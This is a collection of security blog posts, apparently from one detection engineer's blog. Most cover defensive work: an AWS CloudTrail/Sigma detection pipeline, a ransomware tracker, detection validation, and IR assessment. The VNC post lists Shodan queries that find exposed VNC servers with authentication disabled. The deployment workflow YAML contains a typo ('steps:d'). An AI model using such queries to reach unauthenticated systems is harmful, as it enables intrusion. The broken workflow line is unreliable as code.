I needed to come up with a detection for an AWS environment, that is cheap, will take custom detection (preferably Sigma rule for easier maintenance) and somewhat flexible/ customizable. I ended up using with the Lambda that consume sigma and CloudTrail, called CTDE.

Now the next hurdle is deploying detection as a code (kinda) for CTDE. Just like CTDE before, we need to draw up requirement for this pipeline. Which are version control, audit log, verification of the rules, re-usability (this is taken care of, since CTDE consume Sigma rules).

Setup

The pipeline setup consist of a repository, Github action to verify Sigma and another one to push to S3 rule bucket of the CTDE. in the AWS side, the action was limited by a role that uses Github OIDC to authenticate and a policy to limit that role permission.

To set this up, you will need to:

1. Create an OIDC Provider in IAM

   • Go to the IAM console → Identity Providers → Add provider.

   • Select OpenID Connect.

   • For Provider URL, enter https://token.actions.githubusercontent.com.

   • For Audience, enter sts.amazonaws.com.

2. Create IAM role for deployment

   • Select Web identity for the trusted entity type.

   • For Identity provider, select the OIDC provider you created (e.g., token.actions.githubusercontent.com).

   • For Audience, choose sts.amazonaws.com

3. Attach permission policy: use permission boundary to limit it to the S3 rules bucket or use custom permission policy

4. Setup Github secrets: as you might’ve seen from the Github action, you’ll need secrets setup in Github AWS_OIDC_ROLE_ARN, S3_BUCKET_NAME, and AWS_REGION.

We’ll go through each of the component below.

Github Action and Repository

The setup consist of two Github actions. One to verify the Sigma rules and will run if changes happens to repository and the second one to sync to S3 rule bucket when verification is successful. This ensure that all synced (and later loaded) rules are verified. While the use of repository ensure a version control and audit log is available.

name: Validate Sigma Rules

on: [push, pull_request, merge_group, workflow_dispatch]

jobs:
  sigma-rules-validator:
    runs-on: ubuntu-latest
    steps:
      - name: Validate Sigma rules
        uses: SigmaHQ/sigma-rules-validator@v1
        with:
          paths: ./rules

The rule tester uses SigmaHQ rules validator, but can also takes custom Sigma rules schema. Custom schema can be useful later when correlation between Sigma rules are introduced to CTDE.

name: Deploy Sigma Rules to AWS S3 (OIDC)

on:
  workflow_run:
    workflows: ["Validate Sigma Rules"] 
    branches: [main]
    types: 
      - completed

# Required: Define permissions for the OIDC token
permissions:
  id-token: write # This is required for OIDC to fetch the token
  contents: read  # Required to checkout the repository code

jobs:
  deploy_rules:
    runs-on: ubuntu-latest
    if: ${{ github.event.workflow_run.conclusion == 'success' }}
    steps:d
      - name: Checkout repository code that have been validated
        uses: actions/checkout@v4
        with:
          ref: ${{ github.event.workflow_run.head_sha }}

      - name: Configure AWS Credentials with OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: ${{ secrets.AWS_OIDC_ROLE_ARN }} # Uses the ARN of the secure role
          aws-region: ${{ secrets.AWS_REGION }}
          role-session-name: GitHubAction-SigmaDeployment 

      - name: Sync Sigma Rules to S3 Bucket
        # The AWS CLI command now runs using the temporary credentials it assumed
        run: |
          aws s3 sync ./rules/ s3://${{ secrets.S3_BUCKET_NAME }}/ --delete

The second Github action then syncs the repository, once the workflows “Validate Sigma Rules” complete, as you can see in the code above. The Github action connects to S3 rules bucket by assuming a role and authentication is handled by OIDC.

Testing and Validation

If you read Practical Detection Engineering, you might be a bit confused because of the wording “validation” used in the github action portion previously. To be clear, the particular github action is actually doing validation strictly for schema of the sigma rule. This has little to do with detection validation I talked about before.

As part of the pipeline, I also do some detection testing to ensure the detection definition (rule/code) is implemented correctly and accurately reflects its intent in the production environment. I did this by running stratus and grimoire, depends on which rule I am trying to test. Findings can be summarized to these points:

1. Most of the Sigma rule fare well, this is expected since at phase 2, CTDE still consume simple Sigma rule.

2. A portion of the Sigma will rule takes longer to consume, hence Lambda timeout need to be extended. This feeds back to the CTDE projects. This is also something to be expected as we developed more complicated rules.

3. Some of the stratus terraform is not working. A workaround I did was to research what the stratus trying to emulate and conduct them via ClickOps, or better, run grimoire with AWS CLI.

IAM Role and Policy

After setting up role with the steps listed above, your IAM role trust policy should looked like this:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
                    "token.actions.githubusercontent.com:sub": "repo:repo-org/repo-name:ref:refs/heads/main" 
                }
            }
        }
    ]
}

I used custom AWS policy that looked like this:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowS3ObjectManagement",
            "Effect": "Allow",
            "Action": [
                "s3:PutObject",
                "s3:GetObject",
                "s3:DeleteObject"
            ],
            "Resource": "arn:aws:s3:::bucket-name/*"
        },
        {
            "Sid": "AllowS3BucketListing",
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::bucket-name"
        }
    ]
}

Both are pretty self explanatory.

More

More reading if you plan to setup something similar:

https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/

https://docs.github.com/en/actions/how-tos/secure-your-work/security-harden-deployments/oidc-in-aws

https://medium.com/@integrationninjas/authenticate-github-actions-with-aws-using-oidc-16f90f54f104

Epilog

A secure, automated, and auditable detection pipeline for a CloudTrail Detection Engine (CTDE) can be effectively implemented by combining GitHub Actions with AWS OIDC (OpenID Connect) authentication.

Cyber security is always evolving. No matter which topic of cyber you are working with, there is always a need to know and learn new stuff, constantly. On one hand, this means a never ending fun, finding out new stuff and trying out stuff, but on the other hand, it is super annoying have to keep up with so many things.

In my field, especially, there is a need to be constantly aware of new threats, whether is a new leak, a new ransomware attack, or new CVE from a widely used software. But new stuff is not always threats, there are myriads of new ways of doing things, new cool software that can potentially be useful for you, edge cases, use cases, new detection techniques, this part feeds into the never ending fun of finding out and trying out stuff.

With the deluge of information that needs handling, I realized quickly that I need differentiate between these information. Having my own Eisnehower Matrix, sort of, is mandatory if I am to stay afloat in this cyber business. My current solution is a sort of knowledge base/ notes for my “fun tryout stuff” (detailed in the graph below).

While the collection for my “fun tryout stuff” is pretty much settled, the urgent/important part of my Eisenhower Matrix is actually the new threats, new attacks, and new CVE. I need to be in the know for all these things, especially if it relate closely to Indonesia market. Currently I have ntfy.sh to monitor ransomware, and a bunch of twitter/ mastodon/ bluesky feeds for CVE, leaks, and the likes. The main pain point is 80% of these information is not related to my use case. Sure, there might be a ransomware attack involving Indonesian entity, or data leak in a closely related industry with mine, but these are few and far between.

So the needs arise, for some sort of feeds that will inform me of incident that have high values to me (i.e. related to Indonesia). Earlier I was aiming for some sort of telegram/ discord bot as front end, and back end is a bunch of worker for different source (i.e. ransomware, CVE, leaks, etc). But in the end I opted for a dashboard as the front end instead. The idea behind it is it’ll be easier in the future to share it if needed, and it might even help someone right now, hence idleak.net.

Design and Development

Ideally I wanted the site to be able to track ransomware incident, cyber news, leaks from stealer all focusing in Indonesia market. My plan was to use python as back end to gather these data, put it in a database (after doing formatting and cleansing) and use a static file to serve the result. To achieve this I designed the development to be of at least three stages with incremental addition in the future. I aim for these features to be developed for the stages:

1. Phase 1: completed worker 01 (ransomware)

2. Phase 2: completed front end and

3. Phase 3: heartbeat function for worker 01

4. Phase 4: completed worker 02 (cyber news)

5. Phase 5: completed worker 03 (stealer)

Currently we are at phase 2, so one of the back end worker and front end is complete, with more workers in the pipeline. You can check out the project here, and the site idleak.net.

Back End

The project used python for back end (worker) with specific function for each worker. These functions are scraping telegram, twitter, rss feeds, API or ransomware board. Worker script hosted in AWS Lambda, with AWS built in role and permission. Back end also handles data cleansing and filtering, which varies based on the worker's role. Finally, a database check is done by connecting to supabase, to see if similar information is already exist, and post it if it’s not presently exist. Here are the more detailed description of functions inside the worker.

1. Initialization and Setup: The program first loads configuration settings (like the Supabase database URL, secret key, and the target country code) from environment variables. It sets up a logging mechanism to record its activities.

2. Connect to Database: It attempts to establish a secure connection to the Supabase database. If the connection fails, the process stops immediately and logs an error.

3. Fetch External Data: It makes a request to the ransomware.live API using the configured country code (e.g., "id" for Indonesia) to retrieve a list of recent ransomware victim reports.

4. Process and Filter by Time: The retrieved raw data is then processed. Any report older than a configured time limit (e.g., 60 hours) is discarded. The remaining recent reports are standardized into a clean format suitable for the database.

5. Check for Duplicates: To prevent storing the same information twice, the program queries the Supabase database to get a list of keys (title, publish date, and source URL) for all existing records. It then compares the new, processed reports against these existing keys, filtering out any entries already present in the database.

6. Insert New Records: The resulting list, containing only the unique, new victim reports, is then inserted into the Supabase table.

7. Final Report: Finally, the program logs how many unique records were successfully inserted and returns a status indicating the operation is complete.

From time to time I needed to check if my worker successfully updated the newest ransomware attack, or if the Lambda is dead. This is quite annoying as I will have to go look at Cloudwatch log for the Lambda. So I decided to add some sort of heartbeat function for the worker. This, however, will cause other features to be push the other to later phases.

Front End

The front end uses static files, and java script is used to pull from the database to sort and show database. CSS used purecss and grid.js used to serve tables. Here are the more detailed explanation of the front end.

1. ransom.html file provides the necessary structure, or skeleton, for the webpage.
   This is the basic web page. It builds the layout, including the header and a simple side menu. Most importantly, it creates an empty box where the data table will go and loads all the necessary external tools, like the database connector and the table builder.

2. ransom.js file contains the application's core logic and data handling.
   This is the part that does the work. It connects to the Supabase cloud database, pulls the list of ransomware incidents, and then uses a tool (Grid.js) to turn that data into a functional table. It then drops this completed, interactive table right into the empty box on the HTML page.

3. ui.js file is a dedicated script for controlling the visual interaction of the page's layout.
   This is a simple script that just handles the side menu. It makes sure that when you click the menu icon, the menu slides in and out correctly, keeping the website clean and easy to use.

Next phases will build up on these workflow, so similar html, js and css will be used, basically to serve different table from different back end worker.

Epilogue

The project arise from my need to a streamlined place to check for ransomware, breach, leaks that focuses in Indonesia market. A python worker back end collect required data and do clean up with Supabase database and html/css used to serve the information that can be accessed in idleak.net.

Requirement and Research

For one of the work I did, I needed to come up with a detection for an AWS environment, that is cheap, will take custom detection (preferably Sigma rule for easier maintenance) and somewhat flexible/ customizable.

With that requirements in mind, I needed something that will be able to take, for the time being, CloudTrail. The thinking behind this was a portion of CloudTrail events are of a high impact from a security standpoint, and with how AWS environment is architectured, having a detection on these high impact CloudTrail will provide pretty good coverage with minimal cost upfront.

Muscle memory immediately bring me to SIEM route. This is something that will be a good base to build upon, I can start with CloudTrail and send a bunch other log later. However shipping log there is not going to be cheap, thus failing the first requirement.

Next best thing I was drawn to was GuardDuty. However, GuardDuty failed in being flexible and taking custom detection. Another offering from AWS that I also thought of was CloudWatch with custom metrics. This setup will allow flexibility and custom detection. However the thought of managing custom detection in CloudWatch give me shivers and relying and later expanding on CloudWatch for detection would felt like building on a wobbly ground.

The last alternative I thought of, and eventually the one I chose, was hosting a lambda that consume CloudTrail and Sigma rule, then fire alert when it found matches. The cost shouldn’t be too big, because the organization is not really that big and it will be super flexible, I can also manage the Sigma rule using a repository and detection pipeline to verify the detection.

Design and Development

The tool will comprise of a python script hosted in AWS Lambda, Amazon SNS to send the alert, two S3 bucket to hold CloudTrail events and sigma signature. A new object in the CloudTrail S3 bucket (i.e. new CloudTrail events) will trigger the python. The python script then load CloudTrail events from S3 bucket, and also the sigma signature. The script then compare the required detection from the sigma with the CloudTrail events and fire email notification for matched events.

This setup, as I mentioned in the requirement, will allow user to have the ability to custom their detection to detect high impact CloudTrail events, and leveraging sigma rules flexibility. So kind of having the flexibility of a SIEM detection, without having to ship the log to a real SIEM, at least until the requirements fit to go the SIEM route.

I designed the development to be of at least three stages with incremental addition in the future. I aim for these features to be developed for the stages:

1. Phase 1: Lambda able to take in hard coded CloudTrail API, send un-formatted email alert

2. Phase 2: Lambda able to read Sigma from S3 and consume Sigma rule

3. Next Phases:

   • Lambda able to send formatted email alert

   • Lambda able to do correlation between rules

   • Lambda able to do threshold for a rule

Each of the stages will have similar steps, that is:

1. definition and configuration

2. coding and local testing.

3. packaging and deployment.

4. monitoring.

Lambda

Currently (i.e. phase 2), The Lambda function is triggered by the s3:ObjectCreated:* event whenever a new CloudTrail log file is written to your S3 bucket, and here is the simplified logic:

1. Get the Rules: The function first fetches your set of custom security criteria (Sigma rules) from a dedicated S3 bucket. It reads all these rules, parses them, and makes a simple list of critical event names it needs to watch for (like DeleteRole or DisableLogging). This list is cached for speed.

2. Get the Logs: When a new CloudTrail log file arrives in its S3 bucket, the function downloads it, decompresses it, and extracts all the individual activity records.

3. Check for Matches: The function goes through every CloudTrail record and checks if its eventName property is present in the cached list of critical event names.

4. Send the Alert: If a record matches a rule, the function immediately publishes the full event details as a message to a designated Amazon SNS Topic, which then notifies your security team (e.g., via email or integrated ticketing system).

Accompanying Lambda is the IAM Execution Role and permission to access the S3, and publish SNS to send the alert. I attached AWSLambdaBasicExecutionRole and a custom permission for S3 access and SNS publishing. Limiting the access only to two buckets needed (Sigma rules and CloudTrail).

Sigma rules

To automate Sigma rule deployment for the setup, I use a GitHub repository and workflows to push rules to an S3 bucket, making it a simple pipeline to deploy rules to the setup. I used GitHub OIDC and an IAM role with limited policy for secure, least privilege and short-lived credentials. Since this is more of the way I deployed the detection pipeline, and less about the engine itself, I’ve talked more about this on a different post here.

Caveats

As you might already figured out, cloud logs and in this case CloudTrail can be pretty noisy, which I believe can be mitigated by at least a couple of things:

• A selection of a right collection of sigma signature is → this is what I meant by a high impact CloudTrail events. For instance, I might want to be alerted on a StopLogging events, but probably not on all DescribeInstances events

• Threshold for the detection. This feature is pretty common in a SIEM, but still on phase 3 for the tool. To come back to the previous example, if I can set a threshold for how many DescribeInstances events per 5 minutes, this is something that I might wanted to be alerted on.

• Correlation between loaded signature. This is also a common feature called composite detection. If a IAM event such as AssumeRole, was followed by a bunch of discovery activities (i.e. DescribeInstances), I might want to be alerted on that.

As part of deploying the Sigma rule, one thing I learned was to test Sigma rule extensively and use the result to feed back into CTDE. I end up increasing the Lambda timeout as part of the lesson learned from Sigma rule testing.

Currently threshold feature is in development and correlation is still further down the pipeline, but the tool is operational if you have several high impact CloudTrail event you want to monitor on.

Conclusion

CTDE tries to fill the gap of aws detection for small organization that needs more flexibility than just turning on GuardDuty, but don’t need a full blown SIEM. If this sounds fun, Terraform script is available with the where you can easily deploy the tool in the github here.

I had an interesting 45 minute conversation with a security engineer from a mostly-cloud company. We talked about how would one start a detection assessment program, mainly brainstorming ideas on what to test.

It was an impromptu chat (kind of), so I yap for a good couple of minutes using “spaghetti in the wall” strategy. I have had sometime afterwards to rethink about what I said, and I guess this is where I would start.

The conversation was mainly about finding ideas on what to test first, and less about the logistic of starting such program.

Anatomy

Diagram above from practical detection engineering describe life cycle of detection engineering. A similar phase with validation, called testing, is part of development phase, and just to make it clear for reader that didn’t read book, here are the differences of testing and validation:

If we are talking detection validation (cloud or otherwise), it falls within the validation phase, with in broad terms can be executed in three stages:

• Planning: this is the phase where objectives, scopes, timelines and stakeholders are defined. The specific defensive capabilities targeted for validation and the criteria for determining their effectiveness are rigidly defined during this phase.

• Execution and data collection: this is where TTPs are executed against target and data collected.

• Analysis and reporting: analysis and reporting of testing output. This phase identify gaps.

Validation phase can be use for the whole TTP used by known threat actor, simulating attack by that threat actor, or it can be made granular to test specific techniques from a threat actor.

With that in mind, the rest of this blog post is part of the planning stage of the validation phase, mentioned above.

Identify

Armed with understanding of validation, and what we are trying to accomplished in the planning stage, we will start with identify critical asset to protect. This step answers the question: What is the most critical thing to protect?

1. Identify Critical Assets: List and rank the systems, data, and applications that are mission-critical (e.g., Active Directory, financial databases, key intellectual property).

2. Model Your Threat: Identify the most likely Threat Actors targeting your organization/industry.

3. Map Adversary Techniques (MITRE ATT&CK): Determine the specific Tactics, Techniques, and Procedures (TTPs) those threat actors use against your critical assets.

Prioritize

This is where you choose the detection to validate. There are several considerations to help you prioritize:

1. High ROI: Focus on the few techniques that, if detected, stop an attacker from causing maximum damage. These are detection with the highest ROI . Focus on Critical Phases P1: Initial Access and Persistence (e.g., Valid Accounts, External Remote Services) and P2: Credential Access and Privilege Escalation (e.g., OS Credential Dumping, Process Injection).

2. Emerging Techniques (Gap Analysis): Work with your Threat Intelligence (CTI) team to identify new MITRE ATT&CK techniques that have been observed in the wild targeting your industry or region since your last validation. Any new, high-prevalence technique that you don't have coverage for becomes an immediate high-priority detection rule to create, test, and validate.

3. Adversary Playbooks: Prioritize testing the detection rules that cover the full attack chains of the specific threat actors you are most concerned about. This means validating the combination of rules that, together, should catch the attacker from initial access to data exfiltration.

4. Maintenance: Rules decay over time due to system changes, software updates, and data source shifts. This pillar focuses on hygiene. These changes may manifest in High False Positive Rate (FPR) Rules, Low Confidence Rules, Critical Data Source Changes etc.

Ideas for Prioritization

Reports or Research

There is a bunch of reports or research by vendors, consultant, and many more. These publication use surveys, public incident lesson learn, etc. These can be a good place to start a discussion about where to start validate detection, of course the more specialized your organization is (in terms of its cloud architecture), these report will be less relevant. What you can also do is filtering these publications by different industry, to make it more relevant to your needs.

The latest google threat horizon report (at the time the blog posted), highlight a couple of common theme found throughout 2025, one of them is importance of foundational security, which is also highlighted in their dashboard shown below.

One of the more prominent report is by CSA, aptly named CSA top threats to cloud computing. On the last edition. CSA gather information for these publication by using two stage surveys and interview. First stage is to gather initial lists of top threats by survey, discussion that aim to be in depth. While the second one use a broad audience of 500 security professional to rank the result from the first stage.

The result is several list of top threats, similar gist with google threat horizon, where “Misconfiguration and inadequate change control”; “Identity and Access Management”; “Insecure interfaces and APIs”, which are pretty basic is highlighted as the top three threats.

CSA’s publication go even detailed by mentioning some of the common variation of these threats, the impact (technical, operational, and business), and even mentioning some anecdotes (case examples) of the threats, and even related controls. All of which are very useful in a discussion of what detection should we test.

One more point for CSA is also the amazing artwork used for their throughout the publication.

Security Benchmark and Guidelines

Security Benchmark and Guidelines, that are specifically crafted for cloud environment could be a very valuable inventory where you can start your discussion of detection assessment. Examples of these benchmark and guidelines are CSA Cloud Control Matrix, CIS Cloud Benchmark, and some of the vendor based one e.g. AWS Well-Architected Framework or Microsoft Azure Security Benchmark.

The heavy lifting on using these benchmarks are “processing” them to be used detection assessment. Since these publications are meant to be benchmark/ guidelines, most of them are prescriptive. So the process will involve discussing over at least these questions:

• do we need detection for specific that prescriptive guide?

• do we have detection for specific that prescriptive guide?

• and do our detection for that prescriptive guide works?

Nevertheless, these benchmark, as with all other sources I mentioned here is invaluable for a starting discussion on detection assessment.

Threat Models or Threat Model Framework

Threat model framework that comes to mind is UCTM, they stated that their goal is to highlight the top undifferentiated attack sequences — not every possible undifferentiated or differentiated sequence. claiming that following list covers the majority of attacks the majority of organizations will experience. Trying to be pareto principle of cloud attacks, and provide the list of their top sequences of cloud attack.

Organization will (commonly) base their defenses (i.e. detection) on their threat model. Starting from currently available threat model in your organization is also a good place to start a discussion. A common problem might be that threat model will be scoped out for a specific projects or technology, translating them to a more broad detection might present a bit of a challenge.

Based on that, threat model and frameworks is also an amazing place to start the discussion on detection assessment.

Threat Databases

Examples of threat databases are Wiz’s cloud threat landscape or datadog’s cloud security atlas. These are collection of threats and vulnerability, specifically built for cloud environment. datadog’s is a bit easier to filter and has a detection suggestion and how to reproduce it with stratus, while Wiz’s has more on related incident anecdotes.

These databases might not be a good place to start, but it will surely contribute to your vocabulary of validation, especially if you have run your detection assessment for several iteration. These databases will also be very useful to keep your validation up to date with the newest vector.

Epilogue

The post briefly describe how ideas if you are starting on detection validation, focusing on the most important part of the validation phase, that is planning. Ideas on how to prioritize and choose which detection to test are laid out above. The hard part was actually operationalizing the planning stage

References

practical detection engineering

https://www.upwind.io/glossary/mitre-attck-evaluations

Indicators of Compromise (IOCs) are simply evidence that a cyber intrusion has occurred. They are the digital breadcrumbs left behind by attackers, helping security teams detect and respond to breaches.

Common examples of IOCs include:

• IP addresses used by attackers.

• Hash values of malicious files.

• Domain names used for command and control.

Types of IOCs

There are numerous types of IOCs depends how you cut the cake, but these are the common ones:

• Atomic IoCs: Basic, indivisible elements like IP addresses, filenames, or domain names.

• Composite Detection: A detection rule that is triggered by the culmination of two or more pre-defined atomic detections or events happening in a specific order, within a defined timeframe, or involving the same entity

• Computed IoCs: Derived from data, such as hash values or regular expressions.

• Behavioral IoCs: Sequences of actions that describe an attacker's Tactics, Techniques, and Procedures (TTPs), like a specific series of API calls.

The "Pyramid of Pain" illustrates that the more difficult an IOC is for an attacker to change (e.g., their TTPs vs. a file hash), the more "pain" it causes them when detected.

Cloud IOCs: New Challenges

With the growth of cloud computing, new types of IOCs have emerged, specific to cloud environments.

• Atomic Cloud IOCs can include AWS IAM names, security group names, or cloud account IDs used by attackers.

• Behavioral Cloud IOCs often involve suspicious sequences of cloud API calls, like manipulating CloudTrail logs or backdooring AMIs.

Developing Effective Detections

When using IOCs to develop security detections, consider:

• Context: Understand how the IOC fits into the broader attack to accurately identify relevant data sources.

• Cost: Balance the resources required for detection (e.g., analyst time, compute power) with the value of the alert.

• Performance: Aim for broad coverage of attacker techniques and durable detections that are harder for attackers to evade.

• Timeliness: Share and act on IOCs quickly, especially new ones, to maximize their defensive value.

• Documentation: Maintain clear records of your detections, alerts, and their organization for better maintenance and team collaboration.

By focusing on these aspects, organizations can effectively leverage IOCs to enhance their cybersecurity posture.

Install the required font

Install the required nerd font, of course you need to set up the font to be used by PowerShell.

Install starship

we will be using starship as the prompt, we can install via:

• via chocolatey

  choco install starship

• or, via msi installer

Configure PowerShell

Configure your PowerShell to use starship, this can be achieved by editing Microsoft.PowerShell_profile.ps1.

Typically the path is ~\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 or ~/.config/powershell/Microsoft.PowerShell_profile.ps1

and you can use notepad to edit Microsoft.PowerShell_profile.ps1

notepad $PROFILE

and add the following line

Invoke-Expression (&starship init powershell)

if that didn’t work, you might don’t have the permission to run unsigned script. Try using this to add permission:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope LocalMachine

refresh current PowerShell profile

. $profile

Configure starship

you can configure starship further by first creating the config file

New-Item -ItemType Directory -Force ~/.config;New-Item -ItemType file ~/.config/starship.toml;

This newly created directory and config file can be found at the user's home directory, e.g. C:\Users\<UserName>.

and I use preset from starship by running

starship preset pastel-powerline -o ~/.config/starship.toml

Now to stop procrastinating and do some work! right after I did the same thing with cmd and my WSL bash.

I started the shodan search using the query below, they, I believe, should produce similar result in shodan.

"authentication disabled" port:5900,5901
"vnc authentication disabled"
"RFB 003.008"
authentication disabled product:"VNC"

After seeing a lot of Jdownloader VNC without authentication, filtering further by adding "jdownloader", or using “images” tabs to quickly understand the result.

Drilling on the statistics, currently I can see 153 instances of Jdownloader VNC with disabled auth, 149 of them are on the default port (5900). These instances are mostly located in Germany, South Korea, and Italy, while USA is number four.

Trend wise, these instances started in Mid 2023 (June-August) and it just keep going up until today (January figures is incomplete).

In the other hand VNC instances without authentication is, in general, going down in statistic as shown below:

JDownloader is not a new software, it’s quite old. The current version, version 2 is released in 2011, so it was kinda weird seing a lot of them is configured with disabled auth VNC 🤔

I tested the official executable and it did not have VNC access enabled by default. I also tried the suggested docker image (not maintained by Jdowloader team), this image have a clear warning HTTP and VNC connection are unencrypted and without password. However running it requires users to manually set up port forwarding for VNC (HTTP is what their example script is using, but no VNC). If that's the case, this new trend is unlikely to come from the Docker image.

I believe the Jdownloader we're seeing is installed through a NAS, self-hosting suite, or another platform where users can easily install it using a simple interface thus the VNC without authentication.

That’s all I have for this late night stroll in the interweb post. To close, here is an attempt where actor (likely automated script) tries download and run executable via powershell, not caring that the command falls into a Jdownloader UI instead of a shell.

Understanding an organization’s current incident response (IR) capabilities is vital, as it enables the identification of current strengths and weaknesses. This knowledge is instrumental in formulating future objectives and optimizing allocation of resources.

This analysis will bring forth a model to evaluate the existing IR capabilities by examining the people, processes, and technology dimensions. The result will be organized into a customized matrix, providing an overview of the IR capabilities. Insights derived from this matrix can help in decisions, including technology acquisition, process improvement, training prioritization among other things.

In essence, this document is aimed to highlight the need for a capability review by accomplishing these primary objectives: first, present a structured approach for assessing Incident Response (IR) capabilities; second, and utilize this approach to conduct an evaluation of current IR capabilities as a proof of concept.

Method

This exercise will evaluate current incident response (IR) capability for specific information asset types. IR capability that will be assessed are detection, analysis, containment, and eradication. While asset type that corresponds with these capabilities are identity, endpoint, network, data, apps (along with their respective subtype). Assessment is conducted by evaluating the dimensions of people[1], process, technology (PPT)[2] for each combination of IR capability with specific asset. Afterward a custom matrix, aptly called IR capability matrix was used to map and present the result.

Figure 1 illustrates different levels of measurement for capability, and for this exercise, assessment will be done by looking whether a capability is present. This means either a certain capability exists, or it does not. The quality of the capability, implementation effectiveness and coverage are not considered (but will be highlighted if information is readily available). Future refinements in measurement level can offer a more comprehensive view of our IR capabilities, this will be discussed in key takeaways section.

The assessment of technology dimension involves determining whether currently available solution to the IR team, has a primary function that directly relate with an IR capability. This approach ensures that a capability is not considered available if the IR team cannot access necessary technology or if it is not immediately accessible.

For example, if we were to measure windows defender detection capability on windows endpoint asset, currently this will be marked as exist, because defender for endpoint, whose main function is just that, is readily available for IR team.

In the other hand, if we were to measure containment capability of AWS console, for asset type AWS identity will not be marked as exist. This is because, although it is possible to contain an AWS identity via AWS console, this is not the primary function of the AWS console.

If a primary function of a certain technology is not related to a certain IR capability, but we have developed or acquired add on that made this capability possible, then this will be marked as exist. Using the previous scenario as an example, if a lambda script or an Azure logic apps in sentinel was to exist where the primary function was to perform containment/ eradication of an identity in AWS, this capability then will be marked as exist.

Process dimension is assessed by reviewing currently available processes in company knowledge base. If a process facilitates the execution of a specific Incident Response (IR) capability, then that capability will be classified as present.

The final element of the PPT framework pertains to the people aspect, there are countless way of measuring this aspect can be as complicated as you wanted to be. A suggestion on how to do it, is a one question to IR personnel “how confident are you in doing [IR capability] in [asset type]?”.

Putting all dimensions into a table below and detailing how the evaluation will be conducted.

Table 1 approach used evaluate IR capability

The IR capability matrix was created to map the outcomes of the previous PPT framework assessment. It is modeled after Sounil Yu’s cyber defense matrix. However, while the cyber defense matrix is designed to address the full scope of the NIST Cyber Security Framework (NIST CSF), only certain parts are relevant to incident response capabilities. Therefore, the IR cycle components—detection, analysis, containment, and eradication—will be used as the capability columns in the matrix. The rows will be populated with asset types, which include identity, endpoint, network, data, cloud and applications. The table below will be utilized to map the results of our evaluation.

Table 2 IR capability matrix

Note that the asset column can be as detailed as it needed to be. User can just put cloud, but might also use sub category e.g. IAM, compute, storage, database, management, networking.

Caveats

Detection and analysis in this document are treated as separate entities, unlike in NIST’s computer security incident guide[3] or SANS’s PICERL[4], where they are collectively categorized under one capability. A decision was made to separate detection and analysis into individual column capabilities. This separation acknowledges the heavy reliance of detection on the technology dimension, contrasting with the analysis capability, which depends greatly on the process dimension. The rationale behind this is to ensure a distinct understanding of each capability, as combining them could obscure the true picture of the current capabilities.

[1] There are numerous way to measure this, I aim for the lowest friction.

[2] PPT framework: wayback machine (archive.org).

[3] Computer Security Incident Handling Guide (nist.gov)

[4] 504-incident-response-cycle.pdf (sans.org)

I had the chance to attend Bsides Cambridge MA on October 5th 2024, and it is a pretty cool meet up. The atmosphere was relaxed, and some of the talks are pretty interesting, even the snacks are pretty good 🥨🧃. Here are recap of the presentations.

Dr. Chris Esquire talked about Software Defined Radio (SDR) where he set up to intercept a satellite communication for less than $1000.

Parth Shukla & Nishit Lakhnotra talked about utilizing AI for bot detection, honestly this felt more like old timey ML/statistic approach for bot detection, but I am not an expert on AI.

Yolanda talks about end to end overview of cryptocurrency infrastructure security architecture and principles.

Zara Perumal & Ryan Reeve talked about using agentic AI for OSINT, this one felt more AI-ish than the previous one (whatever that means🤣). Agentic AI is basically AI that can perform task (including using tools) with minimal human intervention, so this is pretty cool.

Ryan Cohen talks about several recent crypto heists and how these heists teach us about security fundamentals. Interesting because I’ve never even heard some of these heists, and some of them gets pretty complicated real fast.

Ezz Tahoun & Lynn Hamida supposed to deliver talk about correlate and contextualizing alert and logs. Being a blue teamer, this is actually the one I looked forward the most, but the presenter apparently missed their flight, so the talk was canceled.

Fred Heiding talks about the cyber strategy scorecard, where he evaluate cyber strategy from several countries.

This is one of the most interesting one. Unfortunately most of the countries assessed are developed countries so the result are predictable and nothing to write home about (see posted picture below).

One notable result that stood out to me is how South Korea's cyber strategy gives major consideration to vulnerable populations. His work should be finished 2024-2025, so if you are interested stay tuned to his page (https://fredheiding.com/research/)

Oh…he is also planning to apply the framework to developing countries (fingers crossed Indonesia is next!)

Another highlight of the I also get to chat with a particular gentleman that shared his path to cyber from blue collar job, by previously doing 4 years degree in WGU within just 1 year. I’ll never stop being amazed how people get to cyber!

All in all, the experience was delightful, I will definitely attend if there’s another InfoSec meetup nearby, so let me know if you’re aware of any around Boston.😎

The next best thing is a list of lessons learned from my observations of the log onboarding process:

A clear and concise scope should be provided at the beginning. Without this, there will inevitably be scope creep.

A standardized alert, description, meta data for each use case should be established, along with a quality assurance process for use cases produced during the onboarding process.

A clear workflow should be known to all stakeholders. For application owners, this provides knowledge and clarity on their responsibilities. For engineers, it offers clear direction. Additionally, a clear workflow helps identify potential blockers.

A threat modeling process that has detection in mind. Many threat modeling exercises result in threat models that are difficult or inefficient to translate into detection. (e.g. Detection-Oriented Modelling Framework - DOMF, 2023.idsecconf.org)

If your SIEM/SOAR is not effective at maintaining an inventory of these use cases, it's important to have a good process for creating and maintaining this inventory. When creating this process, keep in mind that in the future, you might need to categorize these use cases based on their MITRE categories or the tables they reference. This inventory will also be useful outside of onboarding, especially in measuring SOC matrices.

Tracking visibility and alert capabilities (current and desired) is another thing a SOC should have. This can be done from a couple of different view. You can use MITRE, asset types, or application as a basis for visibility. Without tracking capabilities, it will be hard to measure how far you are from your desired goal, and even worse, whether you are moving toward your goal at all. Regularly reviewing your current capabilities and desired goals is also important, and this goes without saying.

Maintaining an inventory and tracking visibility and alerts help combat one of the pitfalls of detection engineering mentioned in chuvakin's blog, that it often it starts from available data, and not from relevant threats. Prioritization is still very much a gut feeling affair based on assumption, individual perspective and analysis bias.

And since I quoted chuvakin previously, let me close this post with another word of wisdom from chuvakin's blog

